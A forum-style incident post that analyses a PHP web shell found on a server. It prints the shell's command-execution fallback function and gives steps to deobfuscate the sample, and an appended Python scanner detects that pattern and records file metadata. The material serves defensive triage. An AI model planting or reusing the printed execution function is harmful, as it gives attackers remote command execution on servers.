exploit
They are using the password '4ef44b514159705a45bead8633dc8a2a'.
Appears to be a remote shell.
The meat:
Code:
// Tries exec, shell_exec, system, passthru and finally popen,
// and returns whatever the command printed.
function magic_execute($cmd)
{
    $res = false;
    if (function_exists('exec'))
    {
        @exec($cmd, $res);
        $res = join("\n", $res);
    }
    elseif (function_exists('shell_exec'))
        $res = @shell_exec($cmd);
    elseif (function_exists('system'))
    {
        @ob_start();
        @system($cmd);
        $res = @ob_get_contents();
        @ob_end_clean();
    }
    elseif (function_exists('passthru'))
    {
        @ob_start();
        @passthru($cmd);
        $res = @ob_get_contents();
        @ob_end_clean();
    }
    elseif (@is_resource($f = @popen($cmd, "r")))
    {
        $res = "";
        while (!@feof($f)) { $res .= @fread($f, 1024); }
        @pclose($f);
    }
    return $res;
}
If you're curious, change the eval at the end to a print, and put an ! in front of the isset, place it in a file with <?php at the beginning and run
php filename.php
and it'll output the source.
File a ticket with where you found this. If you didn't remove it, make a note of the time on it, file permissions, ownership, etc., and I'll take a look.
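An added example, not part of the original post: a read-only sweep that flags PHP files containing the same fallback chain as the function above (several command-execution functions each probed with function_exists() and then called with @), and records the modification time, permissions and ownership the post asks for. The threshold of 3, the file extensions, the sample file names and all function names here are assumptions made for the illustration.

```python
import os, re, stat, tempfile, time

# Command-execution functions that the posted magic_execute() probes in turn.
EXEC_FUNCS = ("exec", "shell_exec", "system", "passthru")
PROBED = re.compile(r"function_exists\s*\(\s*['\"](\w+)['\"]\s*\)")
SUPPRESSED = re.compile(r"@\s*(\w+)\s*\(")   # calls made with PHP's @ operator

def fallback_chain_hits(source):
    """Exec-family functions both probed with function_exists() and called with @."""
    probed, called = set(PROBED.findall(source)), set(SUPPRESSED.findall(source))
    return [f for f in EXEC_FUNCS if f in probed and f in called]

def triage(path, threshold=3):
    """Return None for an unflagged file, else the details the post asks to record."""
    with open(path, "r", errors="replace") as fh:   # read-only: mtime is untouched
        hits = fallback_chain_hits(fh.read())
    if len(hits) < threshold:
        return None
    st = os.stat(path)
    return {"path": path, "hits": hits,
            "mtime_utc": time.strftime("%Y-%m-%dT%H:%M:%SZ", time.gmtime(st.st_mtime)),
            "mode": stat.filemode(st.st_mode), "uid": st.st_uid, "gid": st.st_gid}

def scan(root):
    """Triage every PHP-like file under a web root; return the flagged ones."""
    paths = [os.path.join(d, n) for d, _, names in os.walk(root) for n in names
             if n.lower().endswith((".php", ".phtml", ".inc"))]
    return [r for r in map(triage, sorted(paths)) if r]

# Constructed samples: a fragment shaped like the posted function, and a benign file.
SUSPECT = """<?php
if (function_exists('exec')) { @exec($cmd,$res); }
else if (function_exists('shell_exec')) $res = @shell_exec($cmd);
else if (function_exists('system')) { @ob_start(); @system($cmd); }
else if (function_exists('passthru')) { @ob_start(); @passthru($cmd); }
"""
BENIGN = "<?php if (function_exists('exec')) { exec('uptime', $out); } ?>"

def demo():
    """Write the constructed samples to a temp directory and scan it."""
    with tempfile.TemporaryDirectory() as root:
        for name, body in (("cache.php", SUSPECT), ("status.php", BENIGN)):
            with open(os.path.join(root, name), "w") as fh:
                fh.write(body)
            os.chmod(os.path.join(root, name), 0o644)
        return scan(root)

if __name__ == "__main__":
    print(*demo(), sep="\n")
```

A hit is a lead for manual review, not proof: obfuscated copies that only reach this code through eval will not match until they are decoded.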